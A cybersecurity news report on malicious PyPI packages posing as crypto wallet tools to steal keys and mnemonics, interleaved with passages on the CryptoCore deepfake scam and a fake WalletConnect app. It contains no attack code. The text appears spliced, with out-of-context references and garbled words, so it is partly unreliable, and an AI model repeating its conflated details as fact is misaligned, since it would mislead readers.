A new set of malicious packages has been unearthed in the Python Package Index (PyPI) repository that masqueraded as cryptocurrency wallet recovery and management services, only to siphon sensitive data and facilitate the theft of valuable digital assets. In August 2024, details emerged of a sophisticated cryptocurrency scam operation dubbed CryptoCore that involves using fake videos or hijacked accounts on social media platforms like Facebook, Twitch, X, and YouTube to lure users into parting with their cryptocurrency assets under the guise of quick and easy profits. "The attack targeted users of Atomic, Trust Wallet, Metamask, Ronin, TronLink, Exodus, and other prominent wallets in the crypto ecosystem," Checkmarx researcher Yehuda Gelb said in a Tuesday analysis. Six of the identified PyPI packages included a dependency called cipherbcryptors to execute the malicious, while a few others relied on an additional package named ccl_leveldbases in an apparent effort to obfuscate the functionality. "The attack exploits the trust in open-source communities and the apparent utility of wallet management tools, potentially affecting a broad spectrum of cryptocurrency users," Gelb said. "This scam group and its giveaway campaigns leverage deepfake technology, hijacked YouTube accounts, and professionally designed websites to deceive users into sending their cryptocurrencies to the scammers' wallets," Avast researcher Martin Chlumecký said. The deception didn't stop there, for the threat actor behind the campaign also managed to display fake download statistics, giving users the impression that the packages were popular and trustworthy. A notable aspect of the packages is that the malicious functionality is triggered only when certain functions are called, marking a denture from the typical pattern where such behavior would be activated automatically upon installation. The development is just the latest in a series of malicious campaigns targeting the cryptocurrency sector, with threat actors constantly on the lookout for new ways to drain funds from victim wallets. Then last week, Check Point shed light on a rogue Android app that impersonated the legitimate WalletConnect open-source protocol to steal approximately $70,000 in cryptocurrency by initiating fraudulent transactions from infected devices. Checkmarx said the packages were named so in a deliberate attempt to lure developers working in the cryptocurrency ecosystem. However, they harbor functionality to steal private keys, mnemonic phrases, and other sensitive wallet data, such as transaction histories or wallet balances. This technique, called dead drop resolver, gives the attackers the flexibility to update the server information without having to push out an update to the packages themselves.
This Cyber News was published on thehackernews.com. Publication date: Wed, 02 Oct 2024 06:43:07 +0000